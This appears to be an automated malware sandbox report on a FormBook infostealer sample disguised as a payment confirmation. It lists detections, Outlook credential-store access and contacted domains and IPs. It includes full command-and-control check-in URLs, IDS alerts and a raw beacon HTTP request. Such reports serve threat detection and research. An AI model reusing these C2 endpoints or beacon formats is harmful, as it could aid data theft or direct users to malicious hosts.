Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E261C5 sqlite3_bind_double,sqlite3_mutex_leave,	6_2_61E261C5
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2619E sqlite3_bind_text16,	6_2_61E2619E
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E26131 sqlite3_bind_text64,	6_2_61E26131
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2610A sqlite3_bind_text,	6_2_61E2610A
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E260C3 sqlite3_bind_blob64,	6_2_61E260C3
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2609C sqlite3_mutex_leave,sqlite3_bind_blob,	6_2_61E2609C
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E263CE sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,	6_2_61E263CE
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E26361 sqlite3_bind_zeroblob,sqlite3_mutex_leave,	6_2_61E26361
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E03329 sqlite3_bind_parameter_name,	6_2_61E03329
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E03317 sqlite3_bind_parameter_count,	6_2_61E03317
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E262E4 sqlite3_bind_pointer,sqlite3_mutex_leave,	6_2_61E262E4
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E262B3 sqlite3_bind_null,sqlite3_mutex_leave,	6_2_61E262B3
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2628D sqlite3_bind_int,sqlite3_bind_int64,	6_2_61E2628D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E03240 sqlite3_value_frombind,	6_2_61E03240
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2623E sqlite3_bind_int64,sqlite3_mutex_leave,	6_2_61E2623E
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E264B5 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,	6_2_61E264B5
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E0A426 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,	6_2_61E0A426
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E10C58 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,	6_2_61E10C58
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E14E9B sqlite3_bind_parameter_index,	6_2_61E14E9B

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.33.6.223	www.sqlite.org	United States	63949	LINODE-APLinodeLLCUS	false
13.248.169.48	www.lenzor.xyz	United States	16509	AMAZON-02US	false
76.223.54.146	www.warc.tech	United States	16509	AMAZON-02US	false
111.119.219.195	www.xiongding.tech	India	45194	SIPL-ASSysconInfowayPvtLtdIN	true
8.222.228.107	www.knowesis.app	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
157.112.187.77	www.splogi.xyz	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
209.74.77.230	www.lifce.life	United States	31744	MULTIBAND-NEWHOPEUS	true
104.21.11.99	www.savposalore.shop	United States	13335	CLOUDFLARENETUS	true
43.251.56.78	an05-prod-v.cdn-ng.net	Taiwan; Republic of China (ROC)	131603	WSN-TW-NET-ASWorldstarNetworkTW	true
104.21.54.112	www.crosspatches.info	United States	13335	CLOUDFLARENETUS	true
3.33.130.190	jingdongpt.shop	United States	8987	AMAZONEXPANSIONGB	true
134.122.135.48	zcdn.8383dns.com	United States	64050	BCPL-SGBGPNETGlobalASNSG	false

Contacted Domains

Name	IP	Active
www.warc.tech	76.223.54.146	true
www.savposalore.shop	104.21.11.99	true
www.lenzor.xyz	13.248.169.48	true
www.crosspatches.info	104.21.54.112	true
www.blogkart4u.xyz	13.248.169.48	true
www.splogi.xyz	157.112.187.77	true
zcdn.8383dns.com	134.122.135.48	true
www.moonavatar.xyz	76.223.54.146	true
bg.microsoft.map.fastly.net	199.232.210.172	true
an05-prod-v.cdn-ng.net	43.251.56.78	true
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	212.229.88.13	true
jingdongpt.shop	3.33.130.190	true
www.xiongding.tech	111.119.219.195	true
www.knowesis.app	8.222.228.107	true
www.dualbitcoin.xyz	13.248.169.48	true
www.lifce.life	209.74.77.230	true
www.sqlite.org	45.33.6.223	true
www.ethereumkeeper.xyz	76.223.54.146	true
www.2y0uoqwoohvdf5vd.top	unknown	unknown
www.quo1ybjmkhdqljoz.top	unknown	unknown
www.jingdongpt.shop	unknown	unknown
www.031233720.xyz	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ethereumkeeper.xyz/gu37/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=iOl0XSH5CDMOf+V+eoOEKsCb+BMhqZbW7cxb7UU6mqRal+VgoP4cZ+zMwQ9+keLoshpFPIsDQUso6w5zMJEXg5krD1+3LX+lFO1BsIkui72/UxfJL4hroIKhe3Am	true	Avira URL Cloud: safe	unknown
http://www.lenzor.xyz/pknc/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=TsWT+PVJyweInpcuqcRAVrxMIv7dn7P2cuEH07dFoI07yBLnimF2FEtrpE3364l8p3e/PDZf3HpC8OkQkQ5LSQz9jdPhxX19W0a8kd2TAI93AlKVrgcReo5HaD+f	true	Avira URL Cloud: safe	unknown
http://www.moonavatar.xyz/r9i5/?5Li4dVwP=B8xCi7I3z1WfC3zy5Gez1uzC140fJkw4gGGGLN6Gdudf8KfCBsF2kFe1qI11OIwlnfJY2ngkWUsth2oSw9Rojf+LdLo2Dx9QyT9m9kTAG2XrNZHK+xybqiPO8qg1&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: safe	unknown
http://www.savposalore.shop/hlq7/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=dKN4O6z/N4DapGrfV/C7O2nEVRSmVfPPG5RCVPQvSrMdLQWk1/Pc9yg0RaCqVVCHUclwHwIYbC5JrD9MUfc58FLQ+Gw/cASq5R5xuOTtHcpssNixd3vu4vq5AdU4	true	Avira URL Cloud: safe	unknown
http://www.2y0uoqwoohvdf5vd.top/qkhv/	true	Avira URL Cloud: safe	unknown
http://www.lifce.life/shtf/	true	Avira URL Cloud: safe	unknown
http://www.savposalore.shop/hlq7/	true	Avira URL Cloud: safe	unknown
http://www.2y0uoqwoohvdf5vd.top/qkhv/?5Li4dVwP=i51Ixu4M5LOvjs5Z0ddqQXQ5E1Fi1x9FEg8Yva/DYuN1L4sxQPD0mZtOQeSo5cgGL7RFWiV8IGjONF0Yd4fmjQIy1qEAWTMe/urhveEh+mb/hG1w6E9a5F3JJ2qi&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: safe	unknown
http://www.knowesis.app/pzq1/	true	Avira URL Cloud: safe	unknown
http://www.lenzor.xyz/pknc/	true	Avira URL Cloud: safe	unknown
http://www.warc.tech/hxn2/	true	Avira URL Cloud: safe	unknown
http://www.knowesis.app/pzq1/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=oDRqyMa6fuBuz7WlB5xgR/U2R+lw6PRTd5aLt2B5ybsFCSl98v1LfAHtcGvTaF2156e6g8X3X06m8zy7zKxgAqv3o+Bu1jvrOy7C8C4bdHaQ8UWAV+MpBEJPTvre	true	Avira URL Cloud: safe	unknown
http://www.dualbitcoin.xyz/qxo2/?5Li4dVwP=o8DmqPI+VqVvnj/m3Ep5ZbXCdv7WCcZ2dVm8WOSQKn+kpW+rBJORlJQWjKKPmEYbP1qOyM3EY1vlLpLVfeIP+aH0F6NJfipveNVVPvCboJX2+lsywWfl6XS7rz+k&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: safe	unknown
http://www.moonavatar.xyz/r9i5/	true	Avira URL Cloud: safe	unknown
http://www.splogi.xyz/ti21/	true	Avira URL Cloud: safe	unknown
http://www.quo1ybjmkhdqljoz.top/ynw5/?5Li4dVwP=ZF/ThatktxT4IEpzG7cEOEQKDl5qXd8mFNyY5ir4FklXSfOpwm6EZv8hiiYfkBo7BOp8Eo5LM5TpY/be/oKrhxeChN5TJBKneWdpD/fpNAQRh0k2tvtFoByt7+at&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: malware	unknown
http://www.splogi.xyz/ti21/?5Li4dVwP=WGxoXqct8zJEPhtsiQfMA1dM1LrnIiVaAgo9WLM116GuHzjz/IohkAfryFvNTok9C5aVkdBOP1BmlC339vhztHjO0CSpSPPM9QqrDBcyhH9jsCXUFnpxoEU8b3PA&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: safe	unknown
http://www.warc.tech/hxn2/?5Li4dVwP=ZV/imptMlgE5kVt5kHU0o4O4tcQA6xECFmm/TGgbqnHG1mgu4lPPPz/ean0zt7O89YX0LhkZHlQmk1AHou5QAwZMyaAlZWiHWzbiDEQq6v3xABUzIQjShnB7ifdL&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: safe	unknown
http://www.jingdongpt.shop/j64s/	true	Avira URL Cloud: safe	unknown
http://www.quo1ybjmkhdqljoz.top/ynw5/	true	Avira URL Cloud: malware	unknown
http://www.lifce.life/shtf/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=FhU37QPUjXoDR/mnXgxIEtz83r1ENt8m3Ft3Wddglnt/yj+Ebcteh0ZFDkUJwOmxlpknkAYCtP36SobD4aBfLUMWPCeFdyDrA6amDitayQW8jkDeTk1K57jxX06f	true	Avira URL Cloud: safe	unknown
http://www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip	false		high
http://www.blogkart4u.xyz/36cg/?5Li4dVwP=c6lcAlso4cwdWdj/XXmo72tXy/48ylF94bq7w+xrmdROEAiOB56qVr/2YdYDhQjBey/p2vWRZnAQFn0r0aT/21GvLN/jduGbC7fAbrbkj9JRjpgLM/b72SNgEYCQ&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: safe	unknown
http://www.dualbitcoin.xyz/qxo2/	true	Avira URL Cloud: safe	unknown
http://www.xiongding.tech/4w1v/	true	Avira URL Cloud: safe	unknown
http://www.ethereumkeeper.xyz/gu37/	true	Avira URL Cloud: safe	unknown
http://www.crosspatches.info/0pv3/?5Li4dVwP=I6G8DBRKF3PN9Cy6eSQwGAyDdGN/cDdG3kSPGuvbR5esC8dJu2Ef2kcQIbt6EaZSMDCxypqKCunYFMFRIQfdU/urNnrnWs/wzEHQWKTFseNumaFucpwU/BWqadt7&VtJ=JTIXk8dX64OXShTp	true	Avira URL Cloud: safe	unknown
http://www.blogkart4u.xyz/36cg/	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://www.quo1ybjmkhdqljoz.top/ynw5/?5Li4dVwP=ZF/ThatktxT4IEpzG7cEOEQKDl5qXd8mFNyY5ir4FklXSfOpwm6EZv8hiiYfkBo7BOp8Eo5LM5TpY/be/oKrhxeChN5TJBKneWdpD/fpNAQRh0k2tvtFoByt7+at&VtJ=JTIXk8dX64OXShTp	Avira URL Cloud: Label: malware
Source: http://www.quo1ybjmkhdqljoz.top/ynw5/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Payent confirmation copy 00888754087.scr	Virustotal: Detection: 57%			Perma Link
Source: Payent confirmation copy 00888754087.scr	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses 32bit PE files

Source: Payent confirmation copy 00888754087.scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payent confirmation copy 00888754087.scr

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: EVew.pdb source: Payent confirmation copy 00888754087.scr
Source:	Binary string: finger.pdb source: RegSvcs.exe, 00000003.00000002.388789742.0000000000834000.00000004.00000020.00020000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000002.866951455.0000000000414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: EVew.pdbSHA256 source: Payent confirmation copy 00888754087.scr
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.388824636.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.389029493.0000000001F30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.0000000002240000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.388630935.0000000001DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HP9gbzNVWxqFR.exe, 00000005.00000000.372400998.0000000000A6F000.00000002.00000001.01000000.00000009.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401709637.000000000007F000.00000002.00000001.01000000.0000000A.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49165 -> 104.21.54.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49178 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49185 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49191 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49192 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49196 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49205 -> 111.119.219.195:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49207 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49219 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49197 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49202 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49210 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49216 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49204 -> 111.119.219.195:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49211 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49186 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49220 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49190 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49214 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49208 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49201 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49215 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49206 -> 111.119.219.195:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49200 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49217 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49213 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49194 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49218 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49212 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49209 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49198 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49203 -> 111.119.219.195:80

Performs DNS queries to domains with low reputation

Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.lenzor.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.dualbitcoin.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.ethereumkeeper.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.moonavatar.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.blogkart4u.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.splogi.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 45.33.6.223 45.33.6.223
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SIPL-ASSysconInfowayPvtLtdIN SIPL-ASSysconInfowayPvtLtdIN

Source: C:\Windows\SysWOW64\finger.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3310000[1].zip

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /0pv3/?5Li4dVwP=I6G8DBRKF3PN9Cy6eSQwGAyDdGN/cDdG3kSPGuvbR5esC8dJu2Ef2kcQIbt6EaZSMDCxypqKCunYFMFRIQfdU/urNnrnWs/wzEHQWKTFseNumaFucpwU/BWqadt7&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
